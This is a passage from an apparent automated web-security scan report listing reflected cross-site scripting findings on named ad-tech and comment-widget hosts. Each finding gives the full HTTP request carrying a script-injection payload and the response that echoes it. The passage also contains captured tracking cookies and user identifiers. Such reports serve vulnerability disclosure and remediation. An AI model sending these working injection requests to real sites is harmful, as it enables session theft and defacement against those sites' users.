Cookie: icu=ChII3I4BEAoYASABKAEw5pj87QQQ5pj87QQYAA..; uuid2=2724386019227846218; anj=Kfu=8fG7*@D>7)*0s]#%2L_'x%SEV/i#-5O4FSlRQHqgVr*.vWOENK)ehqWnCsma+$+8hH(K#:4%p3G.v:Z.zDUs_uD`k?idandj8<b_]+Y9)>JxbT-:TrPyR16f>Ne2L7Lz8m^OiiIAJm'jVZEtjuJe$ztL5<-LfW$dXNID7L9mpq(4KKA%VbltLY4eg0$+7#i$q][=3NPKm9PdYU3jeeGKw$iuu$l7(CzVfnEs:6ds3O/53VXJO>l`mQfRy7#>R9s8Gp7?hk^0.X(K:DxR!xu4bKbqa9mrd.?BNS%+<^MUg`c=6U(h<CU!c+81]xA>Sq9y>MmdLRoi#9l24%8e!G9^p8qI)5d<wou'EE<Q4XP=qFe+1Pw8a5e'3-gc4]Adf3p7=/[iQh-:^]yg$pQmdw2xvaX7'fJOCs>R:a43MLOOsrwE*7eD2io=(L6aU8?@-i+J([k/@1oAQ-cih!w=Tvx:(KWA/7i6ARW]l[9>^gfZdqwm4^*Q]M_@X>`PVGCmzFdLtLD05UF'2hjamcs)la=wvWbosXT/%h`Z4EXqQBXL=5LlruN$pcGk].jcuIeJh^o#@0h2+[<_K%TW)KFDNs8G?>Y%.8^aIc/)Z<Q

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Thu, 05-May-2011 01:30:07 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Tue, 02-Aug-2011 01:30:07 GMT; domain=.adnxs.com; HttpOnly
Content-Type: application/x-javascript
Date: Wed, 04 May 2011 01:30:07 GMT
Content-Length: 183

document.write('<img src="http://tag.admeld.com/matchae1ed'-alert(1)-'cf9de347f51?admeld_adprovider_id=193&external_user_id=2724386019227846218&expiration=0" width="0" height="0"/>');

6.5. http://api-public.addthis.com/url/shares.json [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api-public.addthis.com
Path:   /url/shares.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 5f781<script>alert(1)</script>30271df9147 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /url/shares.json?url=http%3A%2F%2Fwww.truewoman.com%2F&callback=_ate.cbs.sc_httpwwwtruewomancom5f781<script>alert(1)</script>30271df9147 HTTP/1.1
Host: api-public.addthis.com
Proxy-Connection: keep-alive
Referer: http://www.truewoman.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; uit=1; di=1304384619.60|1304384619.1FE|1304290797.1OD; dt=X; uid=4dab4fa85facd099; psc=3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=300
Content-Type: application/javascript;charset=UTF-8
Date: Wed, 04 May 2011 01:12:09 GMT
Content-Length: 89
Connection: close

_ate.cbs.sc_httpwwwtruewomancom5f781<script>alert(1)</script>30271df9147({"shares":815});

6.6. http://ds.addthis.com/red/psi/sites/www.truewoman.com/p.json [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/www.truewoman.com/p.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 58f5c<script>alert(1)</script>b5565e4673a was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /red/psi/sites/www.truewoman.com/p.json?callback=_ate.ad.hpr58f5c<script>alert(1)</script>b5565e4673a&uid=4dab4fa85facd099&url=http%3A%2F%2Fwww.truewoman.com%2F%3Fid%3D1369&ref=http%3A%2F%2Fwww.truewoman.com%2F&o1bgp HTTP/1.1
Host: ds.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh41.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; uit=1; di=1304384619.60|1304384619.1FE|1304290797.1OD; dt=X; psc=4; uid=4dab4fa85facd099

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 452
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Wed, 04 May 2011 01:12:32 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Fri, 03 Jun 2011 01:12:32 GMT; Path=/
Set-Cookie: di=%7B%7D..1304471552.1FE|1304471552.1OD|1304471552.60; Domain=.addthis.com; Expires=Thu, 02-May-2013 17:01:35 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Wed, 04 May 2011 01:12:32 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 04 May 2011 01:12:32 GMT
Connection: close

_ate.ad.hpr58f5c<script>alert(1)</script>b5565e4673a({"urls":["http://pixel.33across.com/ps/?pid=454&uid=4dab4fa85facd099","http://xcdn.xgraph.net/15530/db/xg.gif?pid=15530&sid=10001&type=db&p_bid=4dab4fa85facd099","http://cspix.media6degrees.com/orbser
...[SNIP]...

6.7. http://intensedebate.com/js/getCommentCounts.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://intensedebate.com
Path:   /js/getCommentCounts.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7071a'><script>alert(1)</script>269acc97b81 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/getCommentCounts.php7071a'><script>alert(1)</script>269acc97b81?src=wp-2&acct=e2df9b6910383c7e8b7c05e99be5e886&ids=1017|847|811|804|787|778|708|602|593|582|&guids=&links=http://www.quantumjumping.com/blog/meet-your-doppelganger/|http://www.quantumjumping.com/blog/the-alpha-level/|http://www.quantumjumping.com/blog/were-they-the-special-few/|http://www.quantumjumping.com/blog/to-infinity-and-beyond-week-1/|http://www.quantumjumping.com/blog/tales-of-angelic-guidance/|http://www.quantumjumping.com/blog/encounters-with-angels/|http://www.quantumjumping.com/blog/spiritual-awakening/|http://www.quantumjumping.com/blog/the-invisible-anchor-report/|http://www.quantumjumping.com/blog/past-life-regression/|http://www.quantumjumping.com/blog/quantum-lullaby/|&titles=Meet%2BYour%2BDoppelganger%253A%2BQuantum%2BJumping%2BTips%2BWeek%2B3|The%2BAlpha%2BLevel%253A%2BQuantum%2BJumping%2BTips%2BWeek%2B2|Were%2Bthey%2Bthe%2Bspecial%2Bfew%253F%2B|To%2BInfinity%2Band%2BBeyond%253A%2BWeek%2B1|Tales%2Bof%2BAngelic%2BGuidance|Close%2BEncounters%2Bof%2Bthe%2BAngel%2BKind|The%2BScientific%2BCommunity%25E2%2580%2599s%2BUncomfortable%2BSpiritual%2BAwakening|The%2BInvisible%2BAnchor%253A%2BSpecial%2BReport|Past%2BLife%2BRegression%2B%25E2%2580%2593%2BHow%2BMany%2BLives%2BHave%2BYou%2BLived%253F|Quantum%2BLullaby%2521|&authors=Burt%2BGoldman|Burt%2BGoldman|Burt%2BGoldman|Burt%2BGoldman|admin|admin|admin|admin|admin|admin|&times=2011-04-28%2B11%253A28%253A15|2011-04-15%2B09%253A33%253A44|2011-04-08%2B07%253A55%253A59|2011-04-08%2B07%253A15%253A41|2011-03-14%2B10%253A30%253A40|2011-03-11%2B09%253A15%253A05|2010-10-26%2B05%253A41%253A50|2010-08-26%2B05%253A00%253A33|2010-08-23%2B09%253A57%253A28|2010-07-07%2B09%253A07%253A49| HTTP/1.1
Host: intensedebate.com
Proxy-Connection: keep-alive
Referer: http://www.quantumjumping.com/blog/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 04 May 2011 00:54:43 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Length: 6378

   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <meta http-equiv="Conte
...[SNIP]...
<script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/js/getCommentCounts.php7071a'><script>alert(1)</script>269acc97b81?src=wp-2&acct=e2df9b6910383c7e8b7c05e99be5e886&ids=1017|847|811|804|787|778|708|602|593|582|&guids=&links=http://www.quantumjumping.com/blog/meet-your-doppelganger/|http://www.quantumjumping.com/blog/
...[SNIP]...

6.8. http://intensedebate.com/js/wordpressTemplateLinkWrapper2.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://intensedebate.com
Path:   /js/wordpressTemplateLinkWrapper2.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 88fb1'><script>alert(1)</script>e209ce046d8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/wordpressTemplateLinkWrapper2.php88fb1'><script>alert(1)</script>e209ce046d8?acct=e2df9b6910383c7e8b7c05e99be5e886 HTTP/1.1
Host: intensedebate.com
Proxy-Connection: keep-alive
Referer: http://www.quantumjumping.com/blog/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 04 May 2011 00:54:13 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Length: 4767

   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <meta http-equiv="Conte
...[SNIP]...
<script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/js/wordpressTemplateLinkWrapper2.php88fb1'><script>alert(1)</script>e209ce046d8?acct=e2df9b6910383c7e8b7c05e99be5e886'>
...[SNIP]...

6.9. http://intensedebate.com/remoteVisit.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://intensedebate.com
Path:   /remoteVisit.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 1aa51'><script>alert(1)</script>0255209e1d6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /remoteVisit.php1aa51'><script>alert(1)</script>0255209e1d6?acct=e2df9b6910383c7e8b7c05e99be5e886&time=1304488444232 HTTP/1.1
Host: intensedebate.com
Proxy-Connection: keep-alive
Referer: http://www.quantumjumping.com/blog/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 04 May 2011 00:54:11 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Length: 4760

   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <meta http-equiv="Conte
...[SNIP]...
<script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/remoteVisit.php1aa51'><script>alert(1)</script>0255209e1d6?acct=e2df9b6910383c7e8b7c05e99be5e886&time=1304488444232'>
...[SNIP]...

6.10. http://js.revsci.net/gateway/gw.js [csid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The value of the csid request parameter is copied into the HTML document as plain text between tags. The payload d6955<script>alert(1)</script>ca77a0aed15 was submitted in the csid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gateway/gw.js?csid=K05540d6955<script>alert(1)</script>ca77a0aed15 HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/webware/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Wed, 04 May 2011 01:28:58 GMT
Cache-Control: max-age=86400, private
Expires: Thu, 05 May 2011 01:28:58 GMT
X-Proc-ms: 0
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Wed, 04 May 2011 01:28:57 GMT
Content-Length: 128

/*
* JavaScript include error:
* The customer code "K05540D6955<SCRIPT>ALERT(1)</SCRIPT>CA77A0AED15" was not recognized.
*/

6.11. http://km6633.keymetric.net/KM2.js [hist parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://km6633.keymetric.net
Path:   /KM2.js

Issue detail

The value of the hist request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f2d1f'%3balert(1)//01adbc657d3 was submitted in the hist parameter. This input was echoed as f2d1f';alert(1)//01adbc657d3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /KM2.js?x=1&lcc=0&vid=&rnd=0.14964773133397102&las=0&lkw=&lmt=&rho=&rqu=&rqs=&lca=&lag=&lc1=918897899-1&lc2=&lc3=&lc4=&lc5=&lss=0&lho=www.hertzfurniture.com&lpa=/&lha=&vsq=1&hist=f2d1f'%3balert(1)//01adbc657d3&bfv=10&bcs=1&bje=1&bla=en-us&bsr=1920x1200&bcd=16&btz=360&bge=1 HTTP/1.1
Host: km6633.keymetric.net
Proxy-Connection: keep-alive
Referer: http://www.hertzfurniture.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:19:47 GMT
Server: Microsoft-IIS/6.0
Cache-control: no-cache
P3P: CP="CAO PSA OUR IND"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/javascript
Content-Length: 5124

function km_GetTrackingURL(param) {
var val;
switch (param.toLowerCase()) {
case 'adsource':
val = 'Other Sources'; break;
case 'cpao':
val = '0'; break;
case
...[SNIP]...
TString() + ';path=/;' + ((cbd)?'domain='+cbd:'');
kmCookieDays = 365;
kmExt = new Date();
kmExt.setTime(kmExt.getTime() + 1000 * 60 * 60 * 24 * kmCookieDays);
document.cookie = 'kmE6633=1:0|15097,f2d1f';alert(1)//01adbc657d3;expires=' + kmExt.toGMTString() + ';path=/;' + ((cbd)?'domain='+cbd:'');
kmLat = new Date();
kmLat.setTime(kmLat.getTime() + 1000 * 60 * 60 * 24 * kmCookieDays);
document.cookie = 'kmL6633=1|0|Camp
...[SNIP]...

6.12. http://km6633.keymetric.net/KM2.js [lag parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://km6633.keymetric.net
Path:   /KM2.js

Issue detail

The value of the lag request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b42a6'%3balert(1)//5352df2d6be was submitted in the lag parameter. This input was echoed as b42a6';alert(1)//5352df2d6be in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /KM2.js?x=1&lcc=0&vid=&rnd=0.14964773133397102&las=0&lkw=&lmt=&rho=&rqu=&rqs=&lca=&lag=b42a6'%3balert(1)//5352df2d6be&lc1=918897899-1&lc2=&lc3=&lc4=&lc5=&lss=0&lho=www.hertzfurniture.com&lpa=/&lha=&vsq=1&hist=&bfv=10&bcs=1&bje=1&bla=en-us&bsr=1920x1200&bcd=16&btz=360&bge=1 HTTP/1.1
Host: km6633.keymetric.net
Proxy-Connection: keep-alive
Referer: http://www.hertzfurniture.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:17:34 GMT
Server: Microsoft-IIS/6.0
Cache-control: no-cache
P3P: CP="CAO PSA OUR IND"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/javascript
Content-Length: 5120

function km_GetTrackingURL(param) {
var val;
switch (param.toLowerCase()) {
case 'adsource':
val = 'Other Sources'; break;
case 'cpao':
val = '0'; break;
case
...[SNIP]...
':
val = '0'; break;
case 'cpca':
val = 'Campaign not provided'; break;
case 'kmca':
val = 'Campaign not provided'; break;
case 'cpag':
val = 'b42a6';alert(1)//5352df2d6be'; break;
case 'kmag':
val = 'b42a6';alert(1)//5352df2d6be'; break;
case 'kw':
val = 'Raw Query not available'; break;
case 'kmkw':
val = 'Raw Query not
...[SNIP]...

6.13. http://km6633.keymetric.net/KM2.js [las parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://km6633.keymetric.net
Path:   /KM2.js

Issue detail

The value of the las request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d55c5'%3balert(1)//3bcbcfe8779 was submitted in the las parameter. This input was echoed as d55c5';alert(1)//3bcbcfe8779 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /KM2.js?x=1&lcc=0&vid=&rnd=0.14964773133397102&las=0d55c5'%3balert(1)//3bcbcfe8779&lkw=&lmt=&rho=&rqu=&rqs=&lca=&lag=&lc1=918897899-1&lc2=&lc3=&lc4=&lc5=&lss=0&lho=www.hertzfurniture.com&lpa=/&lha=&vsq=1&hist=&bfv=10&bcs=1&bje=1&bla=en-us&bsr=1920x1200&bcd=16&btz=360&bge=1 HTTP/1.1
Host: km6633.keymetric.net
Proxy-Connection: keep-alive
Referer: http://www.hertzfurniture.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:16:06 GMT
Server: Microsoft-IIS/6.0
Cache-control: no-cache
P3P: CP="CAO PSA OUR IND"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/javascript
Content-Length: 5115

function km_GetTrackingURL(param) {
var val;
switch (param.toLowerCase()) {
case 'adsource':
val = 'Other Sources'; break;
case 'cpao':
val = '0'; break;
case
...[SNIP]...
5097,;expires=' + kmExt.toGMTString() + ';path=/;' + ((cbd)?'domain='+cbd:'');
kmLat = new Date();
kmLat.setTime(kmLat.getTime() + 1000 * 60 * 60 * 24 * kmCookieDays);
document.cookie = 'kmL6633=1|0d55c5';alert(1)//3bcbcfe8779|Campaign not provided|AdGroup not provided|Keyword not provided|unk|Referrer information not available|Raw Query not available;expires=' + kmLat.toGMTString() + ';path=/;' + ((cbd)?'domain='+cbd:'');
...[SNIP]...

6.14. http://km6633.keymetric.net/KM2.js [lc1 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://km6633.keymetric.net
Path:   /KM2.js

Issue detail

The value of the lc1 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c05ad'%3balert(1)//280f35fb585 was submitted in the lc1 parameter. This input was echoed as c05ad';alert(1)//280f35fb585 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /KM2.js?x=1&lcc=0&vid=&rnd=0.14964773133397102&las=0&lkw=&lmt=&rho=&rqu=&rqs=&lca=&lag=&lc1=918897899-1c05ad'%3balert(1)//280f35fb585&lc2=&lc3=&lc4=&lc5=&lss=0&lho=www.hertzfurniture.com&lpa=/&lha=&vsq=1&hist=&bfv=10&bcs=1&bje=1&bla=en-us&bsr=1920x1200&bcd=16&btz=360&bge=1 HTTP/1.1
Host: km6633.keymetric.net
Proxy-Connection: keep-alive
Referer: http://www.hertzfurniture.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:17:47 GMT
Server: Microsoft-IIS/6.0
Cache-control: no-cache
P3P: CP="CAO PSA OUR IND"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/javascript
Content-Length: 5152

function km_GetTrackingURL(param) {
var val;
switch (param.toLowerCase()) {
case 'adsource':
val = 'Other Sources'; break;
case 'cpao':
val = '0'; break;
case
...[SNIP]...
= 'unk'; break;
case 'kmrq':
val = 'Raw Query not available'; break;
case 'kmrq':
val = 'Raw Query not available'; break;
case 'kmc1':
val = '918897899-1c05ad';alert(1)//280f35fb585'; break;
case 'kmc1':
val = '918897899-1c05ad';alert(1)//280f35fb585'; break;
case 'kmc2':
val = 'N/A'; break;
case 'kmc2':
val = 'N/A'; break;
ca
...[SNIP]...

6.15. http://km6633.keymetric.net/KM2.js [lc2 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://km6633.keymetric.net
Path:   /KM2.js

Issue detail

The value of the lc2 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c99ce'%3balert(1)//e7ed632e646 was submitted in the lc2 parameter. This input was echoed as c99ce';alert(1)//e7ed632e646 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /KM2.js?x=1&lcc=0&vid=&rnd=0.14964773133397102&las=0&lkw=&lmt=&rho=&rqu=&rqs=&lca=&lag=&lc1=918897899-1&lc2=c99ce'%3balert(1)//e7ed632e646&lc3=&lc4=&lc5=&lss=0&lho=www.hertzfurniture.com&lpa=/&lha=&vsq=1&hist=&bfv=10&bcs=1&bje=1&bla=en-us&bsr=1920x1200&bcd=16&btz=360&bge=1 HTTP/1.1
Host: km6633.keymetric.net
Proxy-Connection: keep-alive
Referer: http://www.hertzfurniture.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:17:59 GMT
Server: Microsoft-IIS/6.0
Cache-control: no-cache
P3P: CP="CAO PSA OUR IND"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/javascript
Content-Length: 5146

function km_GetTrackingURL(param) {
var val;
switch (param.toLowerCase()) {
case 'adsource':
val = 'Other Sources'; break;
case 'cpao':
val = '0'; break;
case
...[SNIP]...

val = 'Raw Query not available'; break;
case 'kmc1':
val = '918897899-1'; break;
case 'kmc1':
val = '918897899-1'; break;
case 'kmc2':
val = 'c99ce';alert(1)//e7ed632e646'; break;
case 'kmc2':
val = 'c99ce';alert(1)//e7ed632e646'; break;
case 'kmc3':
val = 'N/A'; break;
case 'kmc3':
val = 'N/A'; break;
case 'kmc4':
...[SNIP]...

6.16. http://km6633.keymetric.net/KM2.js [lc3 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://km6633.keymetric.net
Path:   /KM2.js

Issue detail

The value of the lc3 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fbc6a'%3balert(1)//0e073a10466 was submitted in the lc3 parameter. This input was echoed as fbc6a';alert(1)//0e073a10466 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /KM2.js?x=1&lcc=0&vid=&rnd=0.14964773133397102&las=0&lkw=&lmt=&rho=&rqu=&rqs=&lca=&lag=&lc1=918897899-1&lc2=&lc3=fbc6a'%3balert(1)//0e073a10466&lc4=&lc5=&lss=0&lho=www.hertzfurniture.com&lpa=/&lha=&vsq=1&hist=&bfv=10&bcs=1&bje=1&bla=en-us&bsr=1920x1200&bcd=16&btz=360&bge=1 HTTP/1.1
Host: km6633.keymetric.net
Proxy-Connection: keep-alive
Referer: http://www.hertzfurniture.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:18:12 GMT
Server: Microsoft-IIS/6.0
Cache-control: no-cache
P3P: CP="CAO PSA OUR IND"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/javascript
Content-Length: 5146

function km_GetTrackingURL(param) {
var val;
switch (param.toLowerCase()) {
case 'adsource':
val = 'Other Sources'; break;
case 'cpao':
val = '0'; break;
case
...[SNIP]...
'; break;
case 'kmc1':
val = '918897899-1'; break;
case 'kmc2':
val = 'N/A'; break;
case 'kmc2':
val = 'N/A'; break;
case 'kmc3':
val = 'fbc6a';alert(1)//0e073a10466'; break;
case 'kmc3':
val = 'fbc6a';alert(1)//0e073a10466'; break;
case 'kmc4':
val = 'N/A'; break;
case 'kmc4':
val = 'N/A'; break;
case 'kmc5':
...[SNIP]...

6.17. http://km6633.keymetric.net/KM2.js [lc4 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://km6633.keymetric.net
Path:   /KM2.js

Issue detail

